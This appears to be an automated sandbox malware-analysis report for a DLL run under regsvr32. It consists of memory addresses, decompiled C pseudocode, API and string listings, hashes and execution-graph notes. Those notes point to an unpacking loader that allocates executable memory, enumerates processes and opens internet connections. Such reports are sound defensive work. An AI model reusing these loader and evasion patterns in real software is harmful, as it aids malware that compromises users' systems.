                                                                                                                      0x00000000
                                                                                                                      0x61a01e60
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01e11
                                                                                                                      0x61a01e11
                                                                                                                      0x61a01e14
                                                                                                                      0x61a01e9c
                                                                                                                      0x61a01e9f
                                                                                                                      0x61a01ea6
                                                                                                                      0x00000000
                                                                                                                      0x61a01ea8
                                                                                                                      0x61a01eae
                                                                                                                      0x61a01eae
                                                                                                                      0x61a01eb1
                                                                                                                      0x00000000
                                                                                                                      0x61a01eb1
                                                                                                                      0x61a01e1a
                                                                                                                      0x61a01e1a
                                                                                                                      0x61a01e1d
                                                                                                                      0x00000000
                                                                                                                      0x61a01e1f
                                                                                                                      0x61a01e22
                                                                                                                      0x61a01e22
                                                                                                                      0x61a01e25
                                                                                                                      0x00000000
                                                                                                                      0x61a01e25
                                                                                                                      0x61a01e1d
                                                                                                                      0x61a01df0
                                                                                                                      0x61a01df0
                                                                                                                      0x61a01df3
                                                                                                                      0x61a01ec9
                                                                                                                      0x61a01ecd
                                                                                                                      0x61a01ed1
                                                                                                                      0x61a01e75
                                                                                                                      0x61a01e75
                                                                                                                      0x61a01e78
                                                                                                                      0x61a01e7b
                                                                                                                      0x61a01e7e
                                                                                                                      0x61a01e82
                                                                                                                      0x61a01e64
                                                                                                                      0x61a01e64
                                                                                                                      0x61a01e68
                                                                                                                      0x61a01e6e
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01ee6
                                                                                                                      0x61a01ee9
                                                                                                                      0x61a01eb5
                                                                                                                      0x61a01eb5
                                                                                                                      0x61a01eb9
                                                                                                                      0x61a01ebf
                                                                                                                      0x61a01eeb
                                                                                                                      0x61a01eeb
                                                                                                                      0x61a01eee
                                                                                                                      0x61a01e29
                                                                                                                      0x61a01e29
                                                                                                                      0x61a01e2d
                                                                                                                      0x61a01e33
                                                                                                                      0x61a01e33
                                                                                                                      0x61a01eee
                                                                                                                      0x61a01e86
                                                                                                                      0x61a01e86
                                                                                                                      0x61a01e89
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a01e89
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01ed3
                                                                                                                      0x61a01edd
                                                                                                                      0x61a01ee0
                                                                                                                      0x61a01e8b
                                                                                                                      0x61a01e8b
                                                                                                                      0x61a01e8f
                                                                                                                      0x61a01e95
                                                                                                                      0x61a01e95
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01e04
                                                                                                                      0x61a01e0c
                                                                                                                      0x00000000
                                                                                                                      0x61a01e0c
                                                                                                                      0x61a01df3
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01e38
                                                                                                                      0x61a01e3c
                                                                                                                      0x61a01e3c
                                                                                                                      0x61a01cf6
                                                                                                                      0x61a01cfc
                                                                                                                      0x61a01cfe
                                                                                                                      0x61a01d06
                                                                                                                      0x61a01d08
                                                                                                                      0x61a01d0f
                                                                                                                      0x61a01d33
                                                                                                                      0x61a01d36
                                                                                                                      0x61a01d3f
                                                                                                                      0x61a01d41
                                                                                                                      0x00000000
                                                                                                                      0x61a01d43
                                                                                                                      0x61a01d47
                                                                                                                      0x61a01d4d
                                                                                                                      0x61a01d51
                                                                                                                      0x61a01d54
                                                                                                                      0x61a01d57
                                                                                                                      0x61a01ef9
                                                                                                                      0x61a01ef9
                                                                                                                      0x61a01f0b
                                                                                                                      0x61a01f12
                                                                                                                      0x00000000
                                                                                                                      0x61a01d5d
                                                                                                                      0x61a01d64
                                                                                                                      0x61a01d70
                                                                                                                      0x61a01d74
                                                                                                                      0x00000000
                                                                                                                      0x61a01d74
                                                                                                                      0x61a01d57
                                                                                                                      0x00000000
                                                                                                                      0x61a01d20
                                                                                                                      0x61a01d20
                                                                                                                      0x61a01d23
                                                                                                                      0x61a01d27
                                                                                                                      0x61a01d27
                                                                                                                      0x61a01d33
                                                                                                                      0x61a01cfe
                                                                                                                      0x00000000
                                                                                                                      0x61a01dbc
                                                                                                                      0x61a01d84
                                                                                                                      0x61a01d84
                                                                                                                      0x00000000
                                                                                                                      0x61a01d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a01cbb
                                                                                                                      0x61a01caf
                                                                                                                      0x61a01ca1
                                                                                                                      0x61a01c39
                                                                                                                      0x61a01c39
                                                                                                                      0x61a01c43
                                                                                                                      0x61a01c43
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61A01325), ref: 61A01D51
                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61A01325), ref: 61A01D74
                                                                                                                      Strings
                                                                                                                      • VirtualQuery failed for %d bytes at address %p, xrefs: 61A01F00
                                                                                                                      • Unknown pseudo relocation bit size %d., xrefs: 61A01DF9
                                                                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 61A01F17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$ProtectQuery
                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                      • API String ID: 1027372294-974437099
                                                                                                                      • Opcode ID: 8bd380c94b28c8d9d271e995fd0ab6fd8a9cac0372390b7e1eaa7f36abc0226e
                                                                                                                      • Instruction ID: 4c30b9f4c3d955d98051024508d2bbe64359917e3c1e831d22090834e0a95482
                                                                                                                      • Opcode Fuzzy Hash: 8bd380c94b28c8d9d271e995fd0ab6fd8a9cac0372390b7e1eaa7f36abc0226e
                                                                                                                      • Instruction Fuzzy Hash: 25819AB2B1265486EB01CFA5F9807ED3771B749BAEF9C8206DD1817B94CB3AC995C301
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep$_amsg_exit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2363106680-0
                                                                                                                      • Opcode ID: 9b71d81bd554efcca135a58034e7555392f48d5739a389bdfe5b6a6e309bdeda
                                                                                                                      • Instruction ID: 3ef318653ee0572cd762a2b9bffd9e274af41ba5bfb31a43706fd8a56dd143cf
                                                                                                                      • Opcode Fuzzy Hash: 9b71d81bd554efcca135a58034e7555392f48d5739a389bdfe5b6a6e309bdeda
                                                                                                                      • Instruction Fuzzy Hash: A1515231B1370589FB069BA5F9803E522A2BB8C79FF0C8539C91D87360EE3AC4D59346
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E61A021C0(long long* __rax, intOrPtr* __rcx) {
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _t3;
                                                                                                                      				long long* _t17;
                                                                                                                      				long long* _t37;
                                                                                                                      				long long* _t38;
                                                                                                                      
                                                                                                                      				_t35 = __rax;
                                                                                                                      				_t3 =  *__rcx;
                                                                                                                      				if(_t3 > 0xc0000091) {
                                                                                                                      					__eflags = _t3 - 0xc0000094;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t17 = 0;
                                                                                                                      						goto L3;
                                                                                                                      					} else {
                                                                                                                      						if(__eflags > 0) {
                                                                                                                      							__eflags = _t3 - 0xc0000095;
                                                                                                                      							if(_t3 == 0xc0000095) {
                                                                                                                      								goto L27;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t3 - 0xc0000096;
                                                                                                                      								if(_t3 != 0xc0000096) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									goto L21;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t3 - 0xc0000092;
                                                                                                                      							if(_t3 == 0xc0000092) {
                                                                                                                      								goto L27;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t3 - 0xc0000093;
                                                                                                                      								if(_t3 == 0xc0000093) {
                                                                                                                      									goto L2;
                                                                                                                      								} else {
                                                                                                                      									goto L11;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					if(_t3 < 0xc000008d) {
                                                                                                                      						__eflags = _t3 - 0xc0000008;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L27:
                                                                                                                      							__eflags = 0;
                                                                                                                      							return 0;
                                                                                                                      						} else {
                                                                                                                      							if(__eflags > 0) {
                                                                                                                      								__eflags = _t3 - 0xc000001d;
                                                                                                                      								if(_t3 == 0xc000001d) {
                                                                                                                      									L21:
                                                                                                                      									L61A02D80();
                                                                                                                      									__eflags = _t35 - 1;
                                                                                                                      									_t38 = _t35;
                                                                                                                      									if(_t35 == 1) {
                                                                                                                      										L61A02D80();
                                                                                                                      										return 0;
                                                                                                                      									}
                                                                                                                      									__eflags = _t38;
                                                                                                                      									_t4 = 4;
                                                                                                                      									if(_t38 != 0) {
                                                                                                                      										 *_t38();
                                                                                                                      										return 0;
                                                                                                                      									}
                                                                                                                      									goto L6;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t3 - 0xc000008c;
                                                                                                                      									if(_t3 != 0xc000008c) {
                                                                                                                      										goto L11;
                                                                                                                      									} else {
                                                                                                                      										goto L27;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t3 - 0x80000002;
                                                                                                                      								if(_t3 == 0x80000002) {
                                                                                                                      									goto L27;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t3 - 0xc0000005;
                                                                                                                      									if(_t3 != 0xc0000005) {
                                                                                                                      										L11:
                                                                                                                      										return 1;
                                                                                                                      									} else {
                                                                                                                      										L61A02D80();
                                                                                                                      										__eflags = __rax - 1;
                                                                                                                      										if(__rax == 1) {
                                                                                                                      											L61A02D80();
                                                                                                                      											return 0;
                                                                                                                      										}
                                                                                                                      										__eflags = __rax;
                                                                                                                      										_t4 = 4;
                                                                                                                      										if(__rax != 0) {
                                                                                                                      											 *__rax();
                                                                                                                      											return 0;
                                                                                                                      										}
                                                                                                                      										goto L6;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						L2:
                                                                                                                      						_t17 = 1;
                                                                                                                      						L3:
                                                                                                                      						L61A02D80();
                                                                                                                      						_t37 = _t35;
                                                                                                                      						if(_t35 == 1) {
                                                                                                                      							L61A02D80();
                                                                                                                      							_t4 = 0;
                                                                                                                      							__eflags = _t17;
                                                                                                                      							if(_t17 != 0) {
                                                                                                                      								_v16 = 0;
                                                                                                                      								E61A02CA0(0);
                                                                                                                      								return _v16;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							_t4 = 1;
                                                                                                                      							if(_t37 != 0) {
                                                                                                                      								 *_t37();
                                                                                                                      								return 0;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t4;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}








                                                                                                                      0x61a0220b
                                                                                                                      0x61a0220b
                                                                                                                      0x61a021d3

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: signal
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946981877-0
                                                                                                                      • Opcode ID: ad4d076e22d9520d9b93fcca9e6a71dcf6c37439578361982c44f9de1996295d
                                                                                                                      • Instruction ID: 12a5e715142ebe7f0ef8d9f8116126114ad613ef9c327e39e2fe581930854a35
                                                                                                                      • Opcode Fuzzy Hash: ad4d076e22d9520d9b93fcca9e6a71dcf6c37439578361982c44f9de1996295d
                                                                                                                      • Instruction Fuzzy Hash: 282183607113024BFB154DF4B69537A5542AB8D39FF1DCC37CA29CA2A5FE2CC8D84226
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E61A02BD0(struct HINSTANCE__* __eax, void* __rcx) {
                                                                                                                      				struct HINSTANCE__* _t7;
                                                                                                                      				struct HINSTANCE__* _t9;
                                                                                                                      				signed char* _t10;
                                                                                                                      				signed char* _t11;
                                                                                                                      				signed int _t12;
                                                                                                                      				signed int _t13;
                                                                                                                      				signed int _t14;
                                                                                                                      				signed int _t15;
                                                                                                                      				signed int _t16;
                                                                                                                      				signed int _t17;
                                                                                                                      				signed char* _t20;
                                                                                                                      				void* _t21;
                                                                                                                      				void* _t24;
                                                                                                                      				void* _t25;
                                                                                                                      
                                                                                                                      				_t21 = __rcx;
                                                                                                                      				_t7 = __eax;
                                                                                                                      				_t20 =  *0x61a08950;
                                                                                                                      				if(_t20 == 0) {
                                                                                                                      					_t11 = 0;
                                                                                                                      					__eflags = 0;
                                                                                                                      					while(1) {
                                                                                                                      						_t1 = _t21 + 1; // 0x2
                                                                                                                      						_t10 = _t1;
                                                                                                                      						E61A02B40(_t11, __eflags, _t24, _t25);
                                                                                                                      						__eflags = _t20;
                                                                                                                      						if(_t20 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t12 =  *_t20 & 0x000000ff;
                                                                                                                      						__eflags = _t12 - 0x4d;
                                                                                                                      						if(_t12 != 0x4d) {
                                                                                                                      							__eflags = _t12 - 0x6d;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								L18:
                                                                                                                      								_t11 = _t10;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t13 = _t20[1] & 0x000000ff;
                                                                                                                      						__eflags = _t13 - 0x53;
                                                                                                                      						if(_t13 != 0x53) {
                                                                                                                      							__eflags = _t13 - 0x73;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L18;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t14 = _t20[2] & 0x000000ff;
                                                                                                                      						__eflags = _t14 - 0x56;
                                                                                                                      						if(_t14 != 0x56) {
                                                                                                                      							__eflags = _t14 - 0x76;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L18;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t15 = _t20[3] & 0x000000ff;
                                                                                                                      						__eflags = _t15 - 0x43;
                                                                                                                      						if(_t15 != 0x43) {
                                                                                                                      							__eflags = _t15 - 0x63;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L18;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t16 = _t20[4] & 0x000000ff;
                                                                                                                      						__eflags = _t16 - 0x52;
                                                                                                                      						if(_t16 != 0x52) {
                                                                                                                      							__eflags = _t16 - 0x72;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L18;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t17 = _t20[5] & 0x000000ff;
                                                                                                                      						__eflags = _t17 - 0x54;
                                                                                                                      						if(_t17 != 0x54) {
                                                                                                                      							__eflags = _t17 - 0x74;
                                                                                                                      							if(_t17 != 0x74) {
                                                                                                                      								__eflags = _t17 - 0x30 - 9;
                                                                                                                      								if(__eflags > 0) {
                                                                                                                      									goto L18;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t7 = GetModuleHandleA();
                                                                                                                      						__eflags = _t20;
                                                                                                                      						 *0x61a08950 = _t20;
                                                                                                                      						if(_t20 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					_t9 = LoadLibraryW();
                                                                                                                      					 *0x61a08950 = _t20;
                                                                                                                      					return _t9;
                                                                                                                      				}
                                                                                                                      				L1:
                                                                                                                      				return _t7;
                                                                                                                      			}


















                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLibraryLoadModule
                                                                                                                      • String ID: msvcrt.dll
                                                                                                                      • API String ID: 4133054770-370904613
                                                                                                                      • Opcode ID: cac53002641ed9b36dc8c2274fc0e14ee9fd8e03f4652d6524ad28c7d79c03ba
                                                                                                                      • Instruction ID: 904f072dd3d647ee3c979ebf84911096cdee9d0a1ea8e72725f404ad71c272ab
                                                                                                                      • Opcode Fuzzy Hash: cac53002641ed9b36dc8c2274fc0e14ee9fd8e03f4652d6524ad28c7d79c03ba
                                                                                                                      • Instruction Fuzzy Hash: B511602190ABA844FB150FF0F4A63B52BA7A746B0FF8CC417C558023A2D73F46D8D612
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4020351045-0
                                                                                                                      • Opcode ID: 293f624c5436ae6df14e00fcfa5132dff7623d6b167e20e042ba9a14ae1f671b
                                                                                                                      • Instruction ID: 20c34a197cd119b53df487b0ffefe401a269d4602c0ab3785e733735b930c435
                                                                                                                      • Opcode Fuzzy Hash: 293f624c5436ae6df14e00fcfa5132dff7623d6b167e20e042ba9a14ae1f671b
                                                                                                                      • Instruction Fuzzy Hash: D7014875717B0486EA09DFE5F89039923A2B78CB8AF5C8426C90887320DB79C4A59716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:19.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:57
                                                                                                                      Total number of Limit Nodes:8
                                                                                                                      [Execution graph: node list omitted. API calls named at graph nodes: VirtualAlloc, GetNativeSystemInfo, VirtualProtect, Process32FirstW, HttpOpenRequestW, InternetConnectW, GetVolumeInformationW]

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      [Control-flow graph: node list omitted. API calls named at graph nodes: VirtualAlloc, GetNativeSystemInfo, VirtualAlloc, VirtualProtect]
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1196878125.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_120000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                      • API String ID: 2313188843-2517549848
                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction ID: 293b7fc70191dd252ce7d09db3203158210f4751d35e9feb459d5409d4c5e630
                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction Fuzzy Hash: 6F72D430618B488FDB19DF18D8856BAB7E1FB98305F10462DE8CBD7212DB34D996CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X&$mo8$O~
                                                                                                                      • API String ID: 0-2010489101
                                                                                                                      • Opcode ID: c2347ea164830ed0d4a6c65f0050550166cd3a0037bb0a0ce5f91a08a33b34a7
                                                                                                                      • Instruction ID: 6a5313c3882841910a51942184fa071e55cd4ea5190554791fccfa72d789913c
                                                                                                                      • Opcode Fuzzy Hash: c2347ea164830ed0d4a6c65f0050550166cd3a0037bb0a0ce5f91a08a33b34a7
                                                                                                                      • Instruction Fuzzy Hash: BDC1277090479D8BCF58CFA8C88A6EE7BF1FB48354F10821DE846A7650D7B4D949CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8Z$B.
                                                                                                                      • API String ID: 0-2527348568
                                                                                                                      • Opcode ID: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction ID: 9aab12200af81379afa0b2d2d592fa5a7a58bce18c8a16dc476b58366764752b
                                                                                                                      • Opcode Fuzzy Hash: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction Fuzzy Hash: BD02E4705087848FD798DFA8C59AA9EFBE1FB88744F10891DF48687260D7B8D949CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationVolume
                                                                                                                      • String ID: T
                                                                                                                      • API String ID: 2039140958-1662524932
                                                                                                                      • Opcode ID: 0967d41a2eb9fb3d25ac9fb381e60b24cf89f7a4a19ed90094454917ee36c5c8
                                                                                                                      • Instruction ID: 77b95de10bfff641f67f2e2c26f2fa31c575b63fd0959aaf6b2e09c8fcee0d18
                                                                                                                      • Opcode Fuzzy Hash: 0967d41a2eb9fb3d25ac9fb381e60b24cf89f7a4a19ed90094454917ee36c5c8
                                                                                                                      • Instruction Fuzzy Hash: 7941F37061CB848FD7B4DF28D48678ABBE0FB88315F504A5EE88C87256DB749884CB47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 706 18001b94c-18001b9f5 call 18000488c 709 18001baa3-18001bad6 InternetConnectW 706->709 710 18001b9fb-18001ba9d call 1800195d0 706->710 710->709
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectInternet
                                                                                                                      • String ID: G
                                                                                                                      • API String ID: 3050416762-985283518
                                                                                                                      • Opcode ID: dce47d9158bf90ac5c87e873f40270f5f0e313ae64c005fd65b5a0ec8f2786b1
                                                                                                                      • Instruction ID: 9773507c8870805c4c1585e8c723d8a5746d37486085fc99141f3b205cfa01f4
                                                                                                                      • Opcode Fuzzy Hash: dce47d9158bf90ac5c87e873f40270f5f0e313ae64c005fd65b5a0ec8f2786b1
                                                                                                                      • Instruction Fuzzy Hash: 3C41F7705187888FD3B4CF68D48979BFBE0FB89355F508A5EA08DC7261DB749484CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
